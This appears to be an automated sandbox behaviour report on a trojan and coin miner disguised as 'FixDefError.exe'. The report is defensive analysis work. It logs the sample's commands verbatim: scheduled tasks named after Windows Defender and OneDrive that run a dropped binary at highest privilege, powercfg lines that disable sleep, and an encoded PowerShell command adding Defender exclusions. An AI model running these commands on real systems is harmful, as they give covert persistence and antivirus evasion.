      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
      Source: unknownProcess created: C:\ProgramData\RuntimeBrokerData\RegSvc.exe C:\ProgramData\RuntimeBrokerData\RegSvc.exe
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p
      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
      Source: C:\Windows\SysWOW64\powercfg.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\FixDefError.exeProcess created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe "C:\Users\user\AppData\Local\Temp\ProgramStarter.exe"
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAVQBCAHYAVgBJAEcAcABFAEoAbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAYwBJAFQAWQBjAHAAQgBHAEwAVgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAagB0AEcAZAB6AFEAYwBUAEUATQBPAGwAZQBKAFYAcAB3AGkAbAAjAD4AIABAACgAIAA8ACMARgBvAEwAVABHAFkAcwBGAHEAcwByAGkAWQB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBwAEsAUABlAHYARgBGAGwAUgBOAGkAWgBFAFAAWABLAGgATgBJACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBRAFUAQgBKAHkAdgBlAEsARgBUACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEkAcQBjAFcAcQBHAEYAagBSAGMATQBFAGgAWQBzAHUAYgAjAD4A"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
      Source: C:\Users\user\Desktop\FixDefError.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\Desktop\FixDefError.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FixDefError.exe.logJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeFile created: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeJump to behavior
      Source: WinRing0x64.sys.1.drBinary string: \Device\WinRing0_1_2_0
      Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.mine.winEXE@108/25@10/7
      Source: C:\Users\user\Desktop\FixDefError.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: FixDefError.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
      Source: C:\Users\user\Desktop\FixDefError.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeMutant created: \Sessions\1\BaseNamedObjects\eliciting
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:416:120:WilError_01
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeMutant created: \Sessions\1\BaseNamedObjects\disconsolate
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2728:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6136:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3012:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1672:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1392:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: FixDefError.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: FixDefError.exeStatic file information: File size 2393088 > 1048576
